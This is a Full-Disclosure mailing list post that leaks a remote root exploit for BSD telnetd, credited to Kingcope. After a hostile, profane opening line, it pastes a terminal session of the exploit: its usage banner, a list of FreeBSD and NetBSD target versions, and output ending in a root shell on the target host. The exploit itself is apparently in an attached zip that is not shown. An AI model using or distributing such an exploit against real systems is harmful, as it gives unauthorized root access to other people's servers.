shut up kingcope, fucking bug killer!
look what we found fucking whitehat.
h4x# /usr/bin/telnet -t 8 192.168.2.8
BSD telnetd Remote Root Exploit *ZERODAY*
By Kingcope
Year 2011
usage: telnet [-4] [-6] [-8] [-E] [-K] [-L] [-N] [-S tos] [-X atype] [-c] [-d]
[-e char] [-k realm] [-l user] [-f/-F] [-n tracefile] [-r] [-s
src_addr] [-u] [-P policy] [-y] <-t TARGET_NUMBER> [host-name
[port]]
TARGETS:
0 FreeBSD 8.2 i386
1 FreeBSD 8.0/8.1/8.2 i386
2 FreeBSD 7.3/7.4 i386
3 FreeBSD 6.2/6.3/6.4 i386
4 FreeBSD 5.3/5.5 i386
5 FreeBSD 4.9/4.11 i386
6 NetBSD 5.0/5.1 i386
7 NetBSD 4.0 i386
8 FreeBSD 8.2 amd64
9 FreeBSD 8.0/8.1 amd64
10 FreeBSD 7.1/7.3/7.4 amd64
11 FreeBSD 7.1 amd64
12 FreeBSD 7.0 amd64
13 FreeBSD 6.4 amd64
14 FreeBSD 6.3 amd64
15 FreeBSD 6.2 amd64
16 FreeBSD 6.1 amd64
17 TESTING i386
18 TESTING amd64
Trying 192.168.2.8...
Connected to 192.168.2.8.
Escape character is '^]'.
Trying SRA secure login:
*** EXPLOITING REMOTE TELNETD
*** by Kingcope
*** Year 2011
USING TARGET -- FreeBSD 8.2 amd64
SC LEN: 30
ALEX-ALEX
6:36PM up 5 mins, 1 user, load averages: 0.01, 0.15, 0.09
USER TTY FROM LOGIN@ IDLE WHAT
kcope pts/0 192.168.2.3 6:32PM 4 _su (csh)
FreeBSD h4x.Belkin 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Thu Feb 17
02:41:51 UTC 2011
root@xxxxxxxxxxxxxxxxxxxxx:/usr/obj/usr/src/sys/GENERIC amd64
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
greetings to divineint
Attachment:
wolverine-final.zip
Description: Zip archive
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/